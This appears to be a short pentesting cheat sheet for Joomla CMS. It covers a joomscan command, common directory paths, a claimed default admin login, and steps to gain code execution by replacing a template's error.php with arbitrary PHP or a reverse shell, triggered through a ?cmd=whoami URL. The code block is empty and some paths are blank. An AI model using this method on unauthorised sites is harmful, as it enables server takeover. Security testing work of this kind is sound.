# Joomla CMS Pentesting Joomla is a content management system (CMS). ### Scan ``` joomscan -u https://example.com ``` ### Common Directories ``` /administrator/ /administrator/manifests/files/joomla.xml /cache/ /components/ /configuration.php /htaccess.txt /includes/ /index.php /joomla.xml /language/en-GB/en-GB.xml /libraries/ /LICENSE.txt /logs/ /media/ /modules/ /plugins/ /README.txt /templates/ /tmp/ /web.config.txt ``` ### Default Credentials The default username is **"admin"** and no password. ### RCE Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce) If we have admin credential, we may be able to execute arbitrary code by manipulating the site template. #### 1. Login as Admin At first, go to `/administrator` page and login with admin credential. #### 2. Select Template In dashboard, go to template select menu, and click a template name. We can see the list of pages of the template on left menu.\ Here we edit the `error.php` so click it on the left menu. #### 3. Inject Arbitrary Code In the editor for `error.php`, delete the original PHP code and insert arbitrary PHP code such as: ``` ``` If we want to get the target shell, we can insert the code for reverse shell. Please see the [Web Reverse Shell](https://exploit-notes.hdks.org/exploit/shell/web-reverse-shell/) page for details.\ After that, click **Save & Close** . #### 4. Execute Now access to the template’s `error.php` page as below: ``` https://example.com/templates//error.php # or https://example.com/templates//error.php?cmd=whoami ``` ### References * [CMDJunkie](https://www.cmsjunkie.com/blog/post/understanding-the-joomla-directory-structure)